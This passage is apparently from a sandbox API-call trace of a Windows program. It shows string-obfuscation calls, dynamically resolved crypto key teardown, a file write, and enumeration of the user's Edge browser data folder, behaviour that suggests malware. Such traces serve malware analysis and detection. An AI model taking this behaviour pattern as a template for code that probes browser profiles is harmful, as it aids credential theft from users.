lpsz="A170020032E") returned 0xb [0174.039] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.039] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0174.039] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.039] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.039] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0174.039] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0174.039] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0174.039] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0174.039] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0174.039] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0174.039] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.039] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0174.039] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0174.039] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0174.039] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0174.039] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0174.039] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.039] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.039] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.039] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.039] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.039] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.039] WriteFile (in: hFile=0x504, lpBuffer=0x2a71898*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a71898*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0174.040] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.040] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.040] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0174.041] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0174.041] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0174.041] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0174.041] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0174.041] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0174.041] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0174.041] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0174.041] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0174.041] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0174.041] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0174.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0174.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaaa68, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0174.041] CryptDestroyKey (hKey=0x9e1db8) returned 1 [0174.041] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0174.041] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0174.041] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0174.041] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0174.041] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0174.041] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0174.041] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0174.041] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0174.041] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0174.041] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0174.041] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0174.042] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0174.045] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0174.045] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0174.045] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0174.045] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0174.045] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0174.045] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0174.045] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0174.045] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0174.045] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0174.045] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0174.045] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0174.045] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.045] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0174.045] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.045] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0174.045] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.045] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.045] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0174.045] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0174.045] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0174.045] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0174.045] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0174.045] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0174.045] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.046] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0174.046] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0174.046] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0174.046] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0174.046] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0174.046] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.046] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0174.046] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0174.046] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0174.046] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0174.046] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0174.046] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0174.046] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0174.046] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0174.046] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0174.046] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0174.046] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0174.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0174.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6fe0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0174.046] CryptReleaseContext (hProv=0xa7c4c8, dwFlags=0x0) returned 1 [0174.046] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.046] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0174.046] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0174.047] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0174.047] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0174.047] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0174.047] FreeLibrary (hLibModule=0x76390000) returned 1 [0174.047] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.047] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.047] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.047] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.047] CloseHandle (hObject=0x504) returned 1 [0174.048] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.048] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0174.048] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0174.048] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0174.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0174.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0174.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0174.048] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/MicrosoftEdge", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\MicrosoftEdge", lpFilePart=0x8cedf4*="MicrosoftEdge") returned 0x2b [0174.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f960 | out: hHeap=0x2af0000) returned 1 [0174.048] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\MicrosoftEdge" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\microsoftedge")) returned 0x10 [0174.048] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\MicrosoftEdge\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4a9a8d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc895324f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd6772beb, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e20f8 [0174.048] FindNextFileW (in: hFindFile=0x9e20f8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4a9a8d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc895324f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd6772beb, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0174.049] FindNextFileW (in: hFindFile=0x9e20f8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4a9a8d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x92addfb1, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x92addfb1, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="SharedCacheContainers", cAlternateFileName="SHARED~1")) returned 1 [0174.049] FindNextFileW (in: hFindFile=0x9e20f8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6771884, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xd6771884, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xd678d991, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="User", cAlternateFileName="")) returned 1 [0174.049] FindNextFileW (in: hFindFile=0x9e20f8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6771884, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xd6771884, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xd678d991, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="User", cAlternateFileName="")) returned 0 [0174.049] FindClose (in: hFindFile=0x9e20f8 | out: hFindFile=0x9e20f8) returned 1 [0174.049] GetLastError () returned 0x12 [0174.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0174.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0174.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0174.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0174.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0174.049] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0174.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0174.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0174.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0174.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0174.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0174.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0174.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0174.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0174.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0174.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0174.049] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0174.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0174.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0174.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa690 [0174.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0174.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0174.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6f0 [0174.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0174.050] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0174.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0174.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0174.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0174.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0174.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0174.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0174.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0174.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0174.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0174.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0174.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0174.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0174.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0174.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0174.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0174.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0174.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0174.050] HeapFree (in: 